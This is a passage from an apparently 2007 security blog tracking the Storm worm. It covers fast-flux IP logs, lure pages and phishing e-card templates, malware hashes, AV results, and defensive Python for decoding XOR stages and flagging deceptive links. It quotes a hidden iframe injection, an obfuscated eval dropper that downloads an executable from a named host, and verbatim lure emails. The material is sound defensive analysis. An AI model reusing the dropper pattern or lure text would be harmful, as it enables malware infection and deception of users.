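2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1
"""

LINE_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}) \(GMT\)"
    r"(?: - (?:(\d{4}-\d{2}-\d{2} \d{2}:\d{2}) \(GMT\)|(NOW)))?"
    r": (\S+)$"
)
FMT = "%Y-%m-%d %H:%M"


def parse_rotation_log(text, now):
    """Return (start, end, ip) tuples. A line with one timestamp is a single
    observation (end == start); 'NOW' means the IP was still current at `now`."""
    runs = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError("unparsed line: %r" % line)
        start = datetime.strptime(m.group(1), FMT)
        if m.group(2):
            end = datetime.strptime(m.group(2), FMT)
        elif m.group(3):
            end = now
        else:
            end = start
        runs.append((start, end, m.group(4)))
    return runs


def assess_flux(runs, min_distinct=5, max_median_hold_min=60):
    """Hold time per public IP plus a simple verdict; the thresholds are assumptions."""
    public = [r for r in runs if not ipaddress.ip_address(r[2]).is_loopback]
    holds = sorted((e - s).total_seconds() / 60 for s, e, _ in public)
    distinct = len({ip for _, _, ip in public})
    median = holds[len(holds) // 2]
    span = (public[-1][1] - public[0][0]).total_seconds() / 60
    return {
        "distinct_ips": distinct,
        "median_hold_min": median,
        "observed_span_min": span,
        "is_flux": distinct >= min_distinct and median <= max_median_hold_min,
        # Loopback as the current answer means the domain is parked or sinkholed.
        "ends_on_loopback": ipaddress.ip_address(runs[-1][2]).is_loopback,
    }


def report(text=ROTATION_LOG, now="2007-09-08 17:00"):
    return assess_flux(parse_rotation_log(text, datetime.strptime(now, FMT)))


if __name__ == "__main__":
    for k, v in report().items():
        print("%-20s %s" % (k, v))
```

The same functions work on a longer log; what distinguishes the Storm domains from a CDN is the combination of many unrelated consumer IPs (the addresses above span several ISPs) and short holds, which is why both numbers are reported rather than a single score.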

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done) and serves NFLTracker.exe (detected as Trojan.Peed.III). It's not using any of the xor'd javascript or browser exploits; this page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'


Thursday, September 06, 2007

CME711 (Storm) using TOR ruse

This morning I woke up to the latest storm page...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width="500">
<tr><td><img src="img/tor1.gif"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan="2">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href="tor.exe"><img src="img/tor2.png" border=0></a>
</td></tr>
</table>
</body>
</html>
The text is a word-for-word cut and paste from the official TOR website, tor.eff.org.

In summary, they're betting on more clicks by offering The Onion Router (TOR) proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included TOR in the download!

The files file.php, sony.exe and tor.exe are resolving while video.exe, setup.exe and labor.exe no longer resolve.

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/


Storm, meet Danchev - and SMTP Honeypots.

Dancho Danchev has been playing around with storm's fastflux and created some neat pictures showing how dynamic this network actually is.

His blog post is located here: http://ddanchev.blogspot.com/2007/09/storm-worms-fast-flux-networks.html

DISOG has been running internal SMTP honeypots for Stormworm since around August 15th. Since that date we've captured over 22,000 unique IP addresses!

Today was a slow day, 1651 unique IPs in just under 6000 emails. Since September 1st, we've managed to capture over 4685 unique IP addresses.

(Note, many IP's have been cleaned already, they are posted here for historical purposes only)


Monday, September 03, 2007

Latest Stormworm sharing Labor Day greetings

The CME-711 (Stormworm) peers are now spreading Windows executable files with the following names:

file.php, video.exe, setup.exe, sony.exe and labor.exe
Sony.exe and labor.exe are new over the last 48 hours. Be sure to update your IDS Signatures.

Labor.exe is in reference to the Labor Day holiday:

Our Greeting System has a Labor Day card for you, go here to pick it up:

http:// yahoo.com /07cards/ greet1?[random hex string]

We're getting a new file on each download attempt again:

413801f06694ad17a7fa03508317fdac labor.exe
4f69c5550a497a02e0f690945925f398 labor.exe
024bf16416645df65358777b214d7997 labor.exe
2aa54149fcfc7ebaa960a8d5648d7dbb labor.exe
6cd2ed30fc3653f241b0702ef4c6f3c6 labor.exe
95b57c8cf2022317aafca06dae2d14be labor.exe
352cf8ef2bbca763d2d03e83fb86c9fd labor.exe
781e08a5dcc2c53646ed097e533d6659 labor.exe
accc4e975b8ab70b4286d113fe5e09dc labor.exe
7375b5c6614cf1a24713949a2ea9800a labor.exe
d43611911af1f7a2401faab91214c2bc labor.exe
cbe59b6688925857ab76301ce61919e5 labor.exe
0b9b061d368763ab51bf6d78f3c36086 labor.exe
651709024ebb9b830fdb9fca161348ae labor.exe

Our MD5 list has been updated, identifying the 26,200+ binaries we've captured. You can view it here.


Saturday, September 01, 2007

Peacomm gets scrappy with Kaspersky

This was sent to us by a reader earlier this week:
<iframe src="http://kqfloat.com/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
I spent a few minutes looking at the code this evening...
Downloads xored javascript (like usual) ->

function xor_str(plain_str, xor_key) {
    var xored_str = "";
    for (var i = 0; i < plain_str.length; ++i)
        xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
    return xored_str;
}
function kaspersky(suck,dick){};
function kaspersky2(suck_dick,again){};
var plain_str =
....
....
SNIP
....
....
var xored_str = xor_str(plain_str, 200);
eval(xored_str);

which downloads -> 'http:// fncarp.com /sony.exe' using the useragent:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)

Sony.exe appears to be static, just like video.exe and setup.exe (c05893a656b54164fb486028309bd89e)
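The xor_str() stage above is a single-byte XOR with the key sitting in plain view (200), so there is no need to run it in a browser to see what it does. Here is an added example, not the blog's code, that decodes such a stage statically: it pulls the plain_str literal and the key out of the captured script with regular expressions, undoes the XOR in Python instead of calling eval(), and reports the URLs the next stage would reach for. The captured script is constructed in the block by encoding a harmless document.write() with the same XOR, with a placeholder host; only the sony.exe file name comes from the post.

```python
import re

PLAIN_RE = re.compile(r'var\s+plain_str\s*=\s*"((?:\\.|[^"\\])*)"')
KEY_RE = re.compile(r"xor_str\(\s*plain_str\s*,\s*(\d+)\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def js_literal_to_codepoints(literal):
    """Body of a JS double-quoted string literal -> list of code points.
    Handles \\xNN escapes and plain characters; any other escape yields the
    escaped character itself, which is all this sample needs."""
    out, i = [], 0
    while i < len(literal):
        if literal[i] == "\\" and i + 3 < len(literal) and literal[i + 1] == "x":
            out.append(int(literal[i + 2:i + 4], 16))
            i += 4
        elif literal[i] == "\\" and i + 1 < len(literal):
            out.append(ord(literal[i + 1]))
            i += 2
        else:
            out.append(ord(literal[i]))
            i += 1
    return out


def xor_decode(codepoints, key):
    """Same transform as the dropper's xor_str(), done here with no eval()."""
    return "".join(chr(cp ^ key) for cp in codepoints)


def decode_stage(script):
    """Pull plain_str and the key out of a captured stage, decode it, and
    report what the next stage would do."""
    m_plain, m_key = PLAIN_RE.search(script), KEY_RE.search(script)
    if not (m_plain and m_key):
        raise ValueError("no xor_str() stage found in script")
    key = int(m_key.group(1))
    decoded = xor_decode(js_literal_to_codepoints(m_plain.group(1)), key)
    return {
        "key": key,
        "decoded": decoded,
        "urls": URL_RE.findall(decoded),
        "uses_eval": "eval(" in decoded,  # True would mean yet another layer
    }


def build_sample(inner_js, key):
    """Constructed stand-in for the captured page: XOR the real script with
    `key` and emit it as a \\xNN-escaped literal, the form xor_str() consumes."""
    literal = "".join("\\x%02x" % (ord(c) ^ key) for c in inner_js)
    return (
        'function xor_str(plain_str, xor_key){ var xored_str = "";\n'
        "for (var i = 0 ; i < plain_str.length; ++i) xored_str += "
        "String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; }\n"
        'var plain_str = "%s";\n'
        "var xored_str = xor_str(plain_str, %d); eval(xored_str);\n" % (literal, key)
    )


# Constructed payload; the host is a placeholder, the file name is the one from the post.
CAPTURED = build_sample(
    "document.write('<iframe src=\"http://malware.example/sony.exe\" width=1 height=1></iframe>');",
    200,
)

if __name__ == "__main__":
    result = decode_stage(CAPTURED)
    print("key:", result["key"])
    print("decoded:", result["decoded"])
    print("urls:", result["urls"])
```

Because the key is recovered from the script itself, the same function works when the authors rotate it; if a later stage turns out to contain another eval(), feed the decoded text back into decode_stage() until uses_eval is False.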


Peed Goes Static

For the last few days, the Peed servers have stopped rotating their malware. They are sticking with the static MD5 sum of c05893a656b54164fb486028309bd89e.

Most of the major Antivirus vendors are aware of the file:
File setup.exe received on 09.01.2007 17:54:57 (CET)

Antivirus           Version         Last Update   Result
AhnLab-V3           2007.9.1.0      2007.09.01    Win32/Zhelatin.worm.138240.B
AntiVir             7.4.1.66        2007.08.31    Worm/Zhelatin.HJ
Authentium          4.93.8          2007.09.01    W32/Tibs.XB
Avast               4.7.1029.0      2007.09.01    Win32:Tibs-BCY
AVG                 7.5.0.484       2007.08.31    Generic6.WTZ
BitDefender         7.2             2007.09.01    Trojan.Peed.PB
CAT-QuickHeal       9.00            2007.09.01    -
ClamAV              0.91.2          2007.09.01    -
DrWeb               4.33            2007.09.01    BackDoor.Groan
eSafe               7.0.15.0        2007.08.29    -
eTrust-Vet          31.1.5100       2007.08.31    Win32/Pecoan
Ewido               4.0             2007.09.01    -
FileAdvisor         1               2007.09.01    -
Fortinet            3.11.0.0        2007.09.01    W32/Tibs@mm
F-Prot              4.3.2.48        2007.08.31    W32/Tibs.XB
F-Secure            6.70.13030.0    2007.08.31    Email-Worm.Win32.Zhelatin.hj
Ikarus              T3.1.1.12       2007.09.01    Backdoor.Win32.Agent.amd
Kaspersky           4.0.2.24        2007.09.01    Email-Worm.Win32.Zhelatin.hj
McAfee              5110            2007.08.31    W32/Nuwar@MM
Microsoft           1.2803          2007.09.01    -
NOD32v2             2495            2007.09.01    -
Norman              5.80.02         2007.08.31    W32/Tibs.dam
Panda               9.0.0.4         2007.09.01    Trj/Alanchum.MV
Prevx1              V2              2007.09.01    -
Rising              19.38.52.00     2007.09.01    Worm.Mail.Win32.Zhelatin.dau
Sophos              4.21.0          2007.09.01    W32/Bagz-I
Sunbelt             2.2.907.0       2007.08.31    Trojan-Downloader.Win32.Tibs.jy
Symantec            10              2007.09.01    Trojan Horse
TheHacker           6.1.9.175       2007.08.31    W32/Zhelatin.hj
VBA32               3.12.2.3        2007.09.01    Email-Worm.Win32.Zhelatin.hj
VirusBuster         4.3.26:9        2007.09.01    I-Worm.Zhelatin.AA
Webwasher-Gateway   6.0.1           2007.08.31    Worm.Zhelatin.HJ

Additional information
File size: 138240 bytes
MD5: c05893a656b54164fb486028309bd89e
SHA1: 8ad506547710d61a6ac0613fdb1d290911f8e600
(Virustotal Results, http://www.virustotal.com)
As you can see, a select few still miss it, so please be careful clicking on those links in email or blog posts!


UPDATE: A closer look at our binaries over the last few days shows that we're still getting random binaries, but only a couple hundred a day, instead of several thousand. By far the most common binary appears to be c05893a656b54164fb486028309bd89e.


Targeted Storm

This morning I woke up to half a dozen targeted Storm Greetings in my mailbox. They looked like this:
Movie-quality postcard for (My Email Account Name)

Class mate(yexnjcegftuory@mittromney.com) has created Movie-quality postcard for you (My Email Account Name)
at lavacards.com.

To see your custom Movie-quality postcard, simply click on the following link:

http://xxx.xxx.xxx.xxx/

Send a FREE greeting card from lavacards.com whenever you want by visiting us at:
This service is provided and hosted by lavacards.com.

These are the first to include the account name used in the email. People may believe the authenticity of these emails because they do appear more targeted.


Saturday, August 25, 2007

Dude, what if your wife finds this?!

The latest storm run is now using http and fake urls.

This is actually good news for us, because most spam filters will catch it. Turning off 'html display' in your email client will help you identify tricks like this:

Subject: Dude, what if your wife finds this?

From: <laura@trisection.com>
Content-Type: text/html;charset=windows-1252
Content-Transfer-Encoding: 7BIT
Message-Id: <1IP0UT-000TG6-8G@wfvy>
Sender: User guzjxoepu <guzjxoepu@wfvy>
Date: Sun, 26 Aug 2007 03:36:09 +0900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><body>OMG, what are you doing man. This video of you is all over the net. take a look, lol... <a
href="http://xx.xx.x.xxx/">http://www.youtube.com/watch?v=12xM6esvMXs</a></body></html>

The latest run uses video.exe and displays a static Youtube logo. All ecard.exe, msdataaccess.exe and applet.exe requests will result in a 404 error.
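The trick in the message above is that the anchor text is a youtube.com URL while the href is a bare IP; turning off HTML display exposes it to a human, and the same check is easy to automate at the mail gateway. Here is an added example (not the blog's code) that parses an HTML body, collects every anchor's real href and visible text, and flags the two things this campaign does: visible URL on one host with the link going to another, and a link whose real target is an IP literal. The message body is constructed to match the spam above; 203.0.113.7 is a documentation address standing in for the masked xx.xx.x.xxx.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_links(html):
    """Flag anchors whose visible text is a URL on a different host than the
    real href, and anchors whose real target is a bare IP address."""
    c = AnchorCollector()
    c.feed(html)
    findings = []
    for href, text in c.links:
        reasons = []
        real = host_of(href)
        if is_ip_literal(real):
            reasons.append("href points at a bare IP address: %s" % real)
        shown = host_of(text) if text.lower().startswith(("http://", "https://")) else ""
        if shown and shown != real:
            reasons.append("visible URL says %s but the link goes to %s" % (shown, real))
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed message body modelled on the spam above; the second anchor is a
# benign control that should not be flagged.
SAMPLE_EMAIL = (
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><body>'
    "OMG, what are you doing man. This video of you is all over the net. take a look, lol... "
    '<a href="http://203.0.113.7/">http://www.youtube.com/watch?v=12xM6esvMXs</a><br>'
    'unsubscribe: <a href="http://www.example.com/unsub">http://www.example.com/unsub</a>'
    "</body></html>"
)

if __name__ == "__main__":
    for f in suspicious_links(SAMPLE_EMAIL):
        print(f["href"], "shown as", f["text"])
        for r in f["reasons"]:
            print("  -", r)
```

The host comparison is deliberately exact rather than fuzzy: a mismatch between what the user sees and where the click goes is the signal, and a legitimate newsletter that links its own domain passes untouched.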

In other news:

We are now submitting our Stormworm IP feeds to Bleeding Edge Threats, and Comcast Communications as well as various private mailing lists and a law enforcement group.

We have captured over 25,000 unique malicious files related to this malware.

Other ISPs are starting to respond to our notifications.

US Cert has issued the following notice:

US-CERT is aware of several new propagation techniques being used by the Storm Worm Trojan to spread. The new variants arrive as either an email message claiming to contain a link to adult pictures, or as credentials for a membership-based website, asking you to login to change your temporary ID and password. The messages contain links to malicious websites that when visited, install malware on the user's system.

US-CERT urges users and administrators to take the following preventative measures to mitigate the security risks:

* Do not follow unsolicited links.
* Configure your web browser as described in the Securing Your Web Browser document.
* Install anti-virus software, and keep its virus signature files up-to-date.
* Refer to the Recognizing and Avoiding Email Scams document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.

UPDATE: Sans ISC Post


Monday, August 20, 2007

Stormworm/Peed/Peacom changing templates (again...)

The storm authors must be putting in as much time changing their routine as I am monitoring them.

A few dozen versions of this were in my email box. Thankfully these aren't targeted..yet. That will give me time to update all those security awareness emails.

Welcome,

Here is your membership info for Online Gamers.

Membership Number: 76245793978563
Your Temp. Login ID: user1043
Temorary Password: pu345

Your temporary Login Info will expire in 24 hours. Please login and change it.

Use this link to change your Login info: http://66.107.xx.xxx/

Thank You,
Confirmation Dept.
Online Gamers



Friday, August 17, 2007

Quick Storm Update

We're seeing an increase in storm spam, one spam drop has received over 200 messages in the last 24 hours.

Most are targeted, and many look like they are trying to pass themselves off as casual messages, not just greeting cards.

All the storm-infected systems we've visited recently are serving up the new Microsoft Data Access page. If you see this page, please close the browser immediately!

We've updated our stats, click on the links in previous posts for the updated lists of over 18000 unique MD5's, 11,000 unique IPs, 486 name servers, and 418 open resolvers.

The tushove.com domain has been suspended, but 12 others still remain.


Tuesday, August 14, 2007

Stormworm filename change.

We've seen a few reports of a new ecard, the latest:
Worshipper(funfrog@rehau.com) has created Funny ecard for you
at postcards.org.

To see your custom Funny ecard, simply click on the following link:

http://xx.xx0.60.111/

Send a FREE greeting card from postcards.org whenever you want by visiting us at:
This service is provided and hosted by postcards.org.
When visiting the URL, you're greeted with:
To view your ecard, you need to have Microsoft Data Access installed on your computer.
Of course you can click and install "Microsoft Data Access", which is also named msdataaccess.exe. It's trojaned, and joins the storm network.


Monday, August 13, 2007

Storm/Peed email template change

The storm authors have slightly altered their egreeting template, the most recent looks like this:

Family member has created a postcard for you at postcards.com,
the Internet's most popular greeting card service.

Your greeting card ID is: (HEX STRING)

To see your custom greeting card, simply click on the link below:
http://xx.xx.xxx.xxx/?(HEX STRING FROM ABOVE)

Send greeting cards from postcards.com whenever you want by visiting us at:
http://postcards.com/
Copyright (c) 1996-2007 postcards.com All Rights Reserved
The postcards.com links are valid pointers.

Paul got this one over the weekend:
Neighbour(secretariaat.antwer ...@libertysurf.fr) has created Animated postcard for you
at yourgreeting.com.

To see your custom Animated postcard, simply click on the following
Internet address (if your mail program doesn't support this feature
you will need to COPY and PASTE the address into your browser's address box):

http://xxx.xxx.xxx.xxx/?089c03307ff04a3fcb36edbf088
Send a FREE greeting card from yourgreeting.com whenever you want by visiting us at:
http://yourgreeting.com/
This service is provided and hosted by yourgreeting.com.


Sunday, August 12, 2007

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Stormworm Nameservers. 364 of the identified nameservers are now functioning as open resolvers.

It is likely the storm gang may be preparing poisoned name servers operating behind network perimeters. If they did that they could use network sensitive IPs in order to mask the fact that infected users have had their network settings altered. If the machine owner was aware enough to examine their network settings they might overlook the presence of an IP within their ISP's address space as a DNS IP. I know my initial reaction would be, "oh Grandecom changed the DHCP provided DNS IPs once again", rather than, "hey, that IP doesn't look right." Were I to check the listed, but compromised, name server I would more than likely only verify that CNN went to CNN, and Apple.com went to Apple. I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL Certificates! Storm, all by itself, could cause widely-dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of customer blocks, but I feel this case warrants blocking inbound port 53 (tcp/udp), and outbound port 25 (tcp) traffic immediately.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.
